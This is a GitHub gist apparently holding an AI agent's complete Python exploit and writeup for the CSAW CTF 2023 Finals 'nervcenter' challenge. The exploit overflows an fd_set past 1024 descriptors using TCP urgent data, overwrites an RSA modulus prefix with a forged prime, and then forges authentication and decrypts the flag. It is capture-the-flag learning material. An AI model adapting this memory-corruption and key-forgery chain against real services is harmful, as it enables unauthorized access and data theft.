Skip to content

Instantly share code, notes, and snippets.

@moyix
Last active March 9, 2026 15:33
Show Gist options
  • Select an option

  • Save moyix/6a46ba0d4aa52ed80c59226262df8ad5 to your computer and use it in GitHub Desktop.

Select an option

Save moyix/6a46ba0d4aa52ed80c59226262df8ad5 to your computer and use it in GitHub Desktop.
Codex + GPT-5.4 solution for CSAW CTF 2023 Finals challenge nervcenter
#!/usr/bin/env python3
import argparse
import base64
import hashlib
import os
import random
import re
import resource
import socket
import subprocess
import sys
import time
from pathlib import Path
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
REPO_DIR = Path(__file__).resolve().parent
CONTAINER_NAME = "nervcenter-real-solve"
CONTROL_PORT = 2000
PORT_RANGE = "2000-2100"
RSA_E = 65537
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")
def run(cmd: list[str], check: bool = True) -> subprocess.CompletedProcess[str]:
return subprocess.run(cmd, check=check, text=True, capture_output=True)
def docker(*args: str, check: bool = True) -> subprocess.CompletedProcess[str]:
return run(["docker", *args], check=check)
def shell_quote(s: str) -> str:
return "'" + s.replace("'", "'\"'\"'") + "'"
def container_running(name: str) -> bool:
result = docker("ps", "-q", "-f", f"name=^{name}$", check=False)
return bool(result.stdout.strip())
def remove_container(name: str) -> None:
docker("rm", "-f", name, check=False)
def start_container(name: str, flag_value: str) -> None:
remove_container(name)
cmd = [
"run",
"-d",
"--name",
name,
"--platform",
"linux/amd64",
"-p",
f"{PORT_RANGE}:{PORT_RANGE}",
"-v",
f"{REPO_DIR}:/ro:ro",
"ubuntu:24.04",
"bash",
"-lc",
(
"apt-get update >/dev/null && "
"apt-get install -y libssl3 zlib1g python3 python3-cryptography >/dev/null && "
"cp /ro/nervcenter /tmp/nervcenter && "
"chmod +x /tmp/nervcenter && "
f"printf '%s\\n' {shell_quote(flag_value)} > /tmp/flag.txt && "
"cd /tmp && exec ./nervcenter"
),
]
run(["docker", *cmd])
def wait_for_port(host: str, port: int, timeout: float = 30.0) -> None:
deadline = time.time() + timeout
last_error: OSError | None = None
while time.time() < deadline:
try:
with socket.create_connection((host, port), timeout=1.0):
return
except OSError as exc:
last_error = exc
time.sleep(0.25)
raise RuntimeError(f"timed out waiting for {host}:{port}: {last_error}")
def wait_for_container_ready(name: str, timeout: float = 120.0) -> None:
deadline = time.time() + timeout
while time.time() < deadline:
result = run(
[
"docker",
"exec",
name,
"bash",
"-lc",
"python3 - <<'PY'\n"
"import importlib.util, subprocess, sys\n"
"ok = importlib.util.find_spec('cryptography') is not None\n"
"running = subprocess.run(\n"
" \"ps -ef | grep -q '[.]\\\\/nervcenter'\",\n"
" shell=True,\n"
" check=False,\n"
").returncode == 0\n"
"sys.exit(0 if ok and running else 1)\n"
"PY",
],
check=False,
)
if result.returncode == 0:
return
time.sleep(1.0)
raise RuntimeError(f"timed out waiting for container {name} to finish startup")
def recv_until(sock: socket.socket, marker: bytes, timeout: float = 10.0) -> bytes:
sock.settimeout(timeout)
data = bytearray()
while marker not in data:
chunk = sock.recv(4096)
if not chunk:
raise RuntimeError(f"connection closed before marker {marker!r}")
data.extend(chunk)
return bytes(data)
def parse_sensor_port(banner: bytes) -> int:
match = re.search(rb"Session sensor port is: (\d+)", banner)
if not match:
raise RuntimeError("could not parse sensor port")
return int(match.group(1))
def parse_public_key(blob: bytes) -> tuple[int, bytes]:
match = re.search(rb"Your public key is:\nssh-rsa ([A-Za-z0-9+/=]+) ", blob)
if not match:
raise RuntimeError("could not parse SSH public key")
data = base64.b64decode(match.group(1))
offset = 0
def take() -> bytes:
nonlocal offset
n = int.from_bytes(data[offset : offset + 4], "big")
offset += 4
out = data[offset : offset + n]
offset += n
return out
key_type = take()
if key_type != b"ssh-rsa":
raise RuntimeError(f"unexpected key type: {key_type!r}")
exponent = int.from_bytes(take(), "big")
modulus = take()
if len(modulus) == 129 and modulus[0] == 0:
modulus = modulus[1:]
if len(modulus) != 128:
raise RuntimeError(f"unexpected modulus length: {len(modulus)}")
return exponent, modulus
def parse_challenge(blob: bytes) -> bytes:
match = re.search(rb"Challenge: ([0-9a-fA-F]+)", blob)
if not match:
raise RuntimeError("could not parse authentication challenge")
return bytes.fromhex(match.group(1).decode())
def parse_encrypted_message(blob: bytes) -> bytes:
match = re.search(
rb"-----BEGIN NERV ENCRYPTED MESSAGE-----\s*(.*?)\s*-----END NERV ENCRYPTED MESSAGE-----",
blob,
flags=re.DOTALL,
)
if not match:
raise RuntimeError("could not parse encrypted message")
return base64.b64decode(b"".join(match.group(1).split()))
def try_raise_nofile(limit: int = 4096) -> None:
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
target = min(limit, hard)
if soft < target:
resource.setrlimit(resource.RLIMIT_NOFILE, (target, hard))
def is_probable_prime(n: int, rounds: int = 24) -> bool:
if n < 2:
return False
small_primes = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)
for p in small_primes:
if n % p == 0:
return n == p
d = n - 1
s = 0
while d % 2 == 0:
s += 1
d //= 2
for _ in range(rounds):
a = random.randrange(2, n - 2)
x = pow(a, d, n)
if x == 1 or x == n - 1:
continue
for _ in range(s - 1):
x = pow(x, 2, n)
if x == n - 1:
break
else:
return False
return True
def find_prime_prefix(suffix: bytes) -> bytes:
tries = 0
while True:
tries += 1
prefix = os.urandom(8)
if prefix[0] == 0:
continue
candidate = int.from_bytes(prefix + suffix, "big")
if candidate % 2 == 0:
continue
if (candidate - 1) % RSA_E == 0:
continue
if is_probable_prime(candidate):
return prefix
def emsa_pkcs1_v1_5_sha256(digest: bytes, k: int) -> bytes:
t = SHA256_DIGESTINFO + digest
ps = b"\xff" * (k - len(t) - 3)
return b"\x00\x01" + ps + b"\x00" + t
def sign_challenge(challenge: bytes, modulus: int, private_exponent: int, k: int = 128) -> bytes:
encoded = emsa_pkcs1_v1_5_sha256(challenge, k)
sig = pow(int.from_bytes(encoded, "big"), private_exponent, modulus)
return sig.to_bytes(k, "big")
def mgf1(seed: bytes, length: int) -> bytes:
out = bytearray()
counter = 0
while len(out) < length:
out.extend(hashlib.sha1(seed + counter.to_bytes(4, "big")).digest())
counter += 1
return bytes(out[:length])
def oaep_unpad(block: bytes) -> bytes:
hlen = hashlib.sha1().digest_size
y = block[0]
masked_seed = block[1 : 1 + hlen]
masked_db = block[1 + hlen :]
seed_mask = mgf1(masked_db, hlen)
seed = bytes(a ^ b for a, b in zip(masked_seed, seed_mask))
db_mask = mgf1(seed, len(masked_db))
db = bytes(a ^ b for a, b in zip(masked_db, db_mask))
lhash = hashlib.sha1(b"").digest()
if y != 0 or db[:hlen] != lhash:
raise RuntimeError("OAEP padding check failed")
rest = db[hlen:]
idx = rest.find(b"\x01")
if idx == -1 or any(rest[:idx]):
raise RuntimeError("OAEP separator not found")
return rest[idx + 1 :]
def decrypt_flag(blob: bytes, modulus: int, private_exponent: int) -> bytes:
if len(blob) < 8 + 16 + 12:
raise RuntimeError("encrypted blob too short")
ciphertext_len = int.from_bytes(blob[:8], "little")
start = 8
end = start + ciphertext_len
ciphertext = blob[start:end]
tag = blob[end : end + 16]
iv = blob[end + 16 : end + 28]
enc_key = blob[end + 28 :]
decrypted = pow(int.from_bytes(enc_key, "big"), private_exponent, modulus)
padded_key = decrypted.to_bytes(len(enc_key), "big")
aes_key = oaep_unpad(padded_key)
return AESGCM(aes_key).decrypt(iv, ciphertext + tag, None)
def open_sensor_farm(host: str, sensor_port: int) -> dict[int, socket.socket]:
sensors: dict[int, socket.socket] = {}
for _ in range(1100):
sensor = socket.create_connection((host, sensor_port), timeout=5.0)
banner = recv_until(sensor, b"> ")
match = re.search(rb"This is sensor ID (\d+)\.", banner)
if not match:
raise RuntimeError("could not parse sensor ID")
fd = int(match.group(1))
sensors[fd] = sensor
if fd >= 1087:
break
if 1087 not in sensors:
raise RuntimeError("failed to force sensor fds above 1023")
return sensors
def exploit(host: str, port: int) -> str:
try_raise_nofile()
with socket.create_connection((host, port), timeout=5.0) as control:
banner = recv_until(control, b"Enter your choice: ")
sensor_port = parse_sensor_port(banner)
control.sendall(b"2\n")
pubkey = recv_until(control, b"Enter your choice: ")
exponent, original_modulus = parse_public_key(pubkey)
if exponent != RSA_E:
raise RuntimeError(f"unexpected public exponent: {exponent}")
prefix = find_prime_prefix(original_modulus[8:])
forged_modulus_bytes = prefix + original_modulus[8:]
forged_modulus = int.from_bytes(forged_modulus_bytes, "big")
private_exponent = pow(RSA_E, -1, forged_modulus - 1)
sensors = open_sensor_farm(host, sensor_port)
try:
keep: dict[int, socket.socket] = {}
mask = int.from_bytes(prefix, "little")
for bit in range(64):
fd = 1024 + bit
if (mask >> bit) & 1:
sensors[fd].send(bytes([65 + (bit % 26)]), socket.MSG_OOB)
keep[fd] = sensors[fd]
time.sleep(0.2)
for fd, sensor in list(sensors.items()):
if fd not in keep:
sensor.close()
del sensors[fd]
time.sleep(1.0)
control.sendall(b"2\n")
pubkey_after = recv_until(control, b"Enter your choice: ")
_, modified_modulus = parse_public_key(pubkey_after)
if modified_modulus != forged_modulus_bytes:
raise RuntimeError(
"failed to rewrite modulus as expected; this path requires working TCP urgent data"
)
control.sendall(b"1\n")
auth_prompt = recv_until(control, b"Response: ")
challenge = parse_challenge(auth_prompt)
signature = sign_challenge(challenge, forged_modulus, private_exponent)
control.sendall(signature.hex().encode() + b"\n")
auth_result = recv_until(control, b"Enter your choice: ")
if b"Authentication successful!" not in auth_result:
raise RuntimeError("authentication failed")
control.sendall(b"1\n")
encrypted = recv_until(control, b"-----END NERV ENCRYPTED MESSAGE-----")
blob = parse_encrypted_message(encrypted)
return decrypt_flag(blob, forged_modulus, private_exponent).decode(
"utf-8", "replace"
).strip()
finally:
for sensor in sensors.values():
try:
sensor.close()
except OSError:
pass
def run_inside_container(name: str) -> int:
cmd = [
"exec",
name,
"/usr/bin/python3",
"/ro/solve.py",
"--host",
"127.0.0.1",
"--port",
str(CONTROL_PORT),
"--network-only",
]
result = run(["docker", *cmd], check=False)
sys.stdout.write(result.stdout)
sys.stderr.write(result.stderr)
return result.returncode
def main() -> int:
parser = argparse.ArgumentParser(description="Exploit for the CSAW Finals challenge nervcenter")
parser.add_argument("--host", default="127.0.0.1")
parser.add_argument("--port", type=int, default=CONTROL_PORT)
parser.add_argument(
"--local-docker",
action="store_true",
help="start a local amd64 Docker container and run the exploit from inside it",
)
parser.add_argument(
"--network-only",
action="store_true",
help="run the network exploit directly without Docker helpers",
)
parser.add_argument("--container-name", default=CONTAINER_NAME)
parser.add_argument(
"--flag",
default="DUMMYFLAG{test_flag}",
help="dummy flag value for --local-docker verification",
)
parser.add_argument(
"--reuse-container",
action="store_true",
help="reuse an existing --local-docker container",
)
global args
args = parser.parse_args()
if args.local_docker and not args.network_only:
if not args.reuse_container or not container_running(args.container_name):
start_container(args.container_name, args.flag)
wait_for_port("127.0.0.1", CONTROL_PORT)
wait_for_container_ready(args.container_name)
return run_inside_container(args.container_name)
flag = exploit(args.host, args.port)
print(f"[+] recovered flag: {flag}")
return 0
if __name__ == "__main__":
sys.exit(main())

nervcenter writeup

Overview

The real solve is not the stdout leak.

The intended chain is:

  1. Abuse the sensor thread's fd_set bookkeeping to overwrite the first 8 bytes of the per-session RSA modulus.

  2. Replace the session modulus with a prime N' that keeps the original low 960 bits.

  3. Since N' is prime, compute

    d = e^{-1} mod (N' - 1)

    with the fixed public exponent e = 65537.

  4. Authenticate by doing raw PKCS#1 v1.5 RSA signing over the challenge under (N', d).

  5. Ask for the encrypted flag and do raw RSA decryption + OAEP unpadding + AES-GCM decryption.

The provided solve.py implements that chain.

Relevant Code Paths

  • FUN_00105df0

    • Per-control-session thread.
    • Allocates a session object and calls FUN_00106310 to generate a fresh 1024-bit RSA keypair.
    • Starts the per-session sensor thread FUN_00105030.
  • FUN_00106310

    • Generates the per-session RSA keypair.
    • Stores only the 128-byte public modulus in the session object at session + 0x270.
  • FUN_001058d0

    • Unauthenticated menu.
    • Option 2 prints the current public key, which lets us read the original modulus bytes before corruption.
  • FUN_00105030

    • Sensor thread.
    • Raises the process file limit to 0x440 (1088) and stores sensor fds in a heap array.
    • Builds three fd_sets inside the session object:
      • read set at session + 0xe0
      • write set at session + 0x168
      • exception set at session + 0x1f0
  • FUN_00105570 / FUN_00106680

    • Challenge-response auth using RSA_verify with the session modulus and fixed e = 65537.
  • FUN_00105c10 / FUN_001057d0 / FUN_00106ac0

    • Authenticated menu option 1.
    • Reads flag.txt.
    • Encrypts it with a random AES-256 key in GCM mode.
    • Wraps the AES key with RSA-OAEP under the session public key.

The bug

The core bug is that the program explicitly raises RLIMIT_NOFILE to 1088, but still uses plain fd_sets, which are only 1024 bits wide on Linux.

In FUN_00105030, each sensor fd is inserted manually like this:

fdset[index >> 6] |= 1ULL << (index & 0x3f);

That logic is used for all connected sensor fds without any FD_SETSIZE bound check.

Once server-side sensor fds reach 1024..1087, the write for the exception set goes out of bounds:

  • exceptfds starts at session + 0x1f0
  • one extra 64-bit word lands at session + 0x270
  • session + 0x270 is exactly the start of the stored RSA modulus

So the sensor thread's select() state for fds 1024..1087 aliases the first 8 bytes of the session modulus.

That is enough to give controlled corruption of the modulus over the network.

Turning that into a usable key

The session public key is printable from the unauthenticated menu, so we can recover the original 128 modulus bytes.

Only the top 8 bytes are writable, so the attack is:

  1. Read the original modulus N.
  2. Keep the low 120 bytes unchanged.
  3. Search for an 8-byte prefix such that:
    • N' = prefix || suffix
    • N' is prime
    • (N' - 1) is coprime to 65537

Because we control 64 high bits and prime density is about 1 / ln(N), finding such a prime is easy.

For a prime modulus, RSA becomes trivial:

d = e^{-1} mod (N' - 1)

No factorization is needed.

Making the overwrite happen

The sensor interface prints the server-side sensor fd in its banner:

This is sensor ID <fd>.

So the exploit:

  1. Opens sensor connections until the service assigns fd 1087.
  2. Chooses which of 1024..1087 should have pending TCP urgent data.
  3. Sends one MSG_OOB byte on exactly that subset.

The resulting exception bitmap becomes the new 8-byte prefix.

One practical wrinkle: if you keep all 1074 sensor connections open, fopen("flag.txt") fails with EMFILE.

So the exploit closes every unneeded sensor after the overwrite and keeps only the subset that is needed to preserve the forged modulus. That frees enough server-side descriptors for the flag path.

Auth and flag decryption

Authentication uses RSA_verify(NID_sha256, challenge, 32, sig, siglen, rsa).

So the exploit builds the standard EMSA-PKCS1-v1_5 SHA-256 encoding:

00 01 ff..ff 00 DigestInfo(SHA256) || challenge

and signs it with raw modular exponentiation:

sig = EM^d mod N'

After auth succeeds, the flag path returns:

[8-byte ciphertext_len][ciphertext][tag][iv][RSA_OAEP(aes_key)]

The exploit then:

  1. RSA-decrypts the wrapped key with c^d mod N'
  2. OAEP-unpads it with SHA-1
  3. AES-GCM decrypts the flag

Local verification

solve.py has a --local-docker helper that starts a local amd64 container, injects a dummy flag.txt, and runs the exploit from inside the container namespace:

python3 solve.py --local-docker --flag 'DUMMYFLAG{real_network_solve}'

That prints:

[+] recovered flag: DUMMYFLAG{real_network_solve}

Running the client from inside the container matters on Docker Desktop/macOS because the host port-forward path did not preserve TCP urgent data correctly. The exploit itself is still fully network-driven; the local helper just avoids the proxy in the verification setup.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment